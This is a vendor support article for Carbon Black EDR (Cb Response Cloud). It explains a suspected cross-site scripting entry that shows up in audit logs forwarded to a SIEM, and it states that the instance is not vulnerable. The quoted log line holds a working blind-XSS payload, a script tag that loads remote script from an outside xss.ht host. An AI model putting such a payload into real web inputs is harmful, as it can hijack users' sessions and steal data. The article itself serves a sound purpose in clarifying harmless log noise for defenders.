CB Response Cloud: Suspected XSS Vulnerability in Audit Logging
Article ID: 287884
Updated On:
Products
Carbon Black EDR (formerly Cb Response)
Issue/Introduction
Suspected XSS vulnerability in the audit logs suggest an attack is being made to the server
- Audit logs forwarded to SIEM will show a similar entry to the below
Unknown 2019-10-29 21:00:03.205757+00:00 "><script src=https://kzn.xss.ht></script>, <IPADDRESS> GET /api/v1/settings/global/advanced 403 Requires Authentication
Environment
- Carbon Black Response Cloud: All Versions
Cause
A script is being sent to the instance
Resolution
The instance is not vulnerable to the XSS exploitation attempt.
Additional Information
- Product Security has investigated the potential vulnerability. It is determined that the attack will not execute on the instance and therefore does not result in XSS Exploitation
- The attempt is logged to the audit logs as expected
- The script is treated as a string and there is no attempt to parse the IP or make use of it in any way
Feedback
Yes
No
Powered by
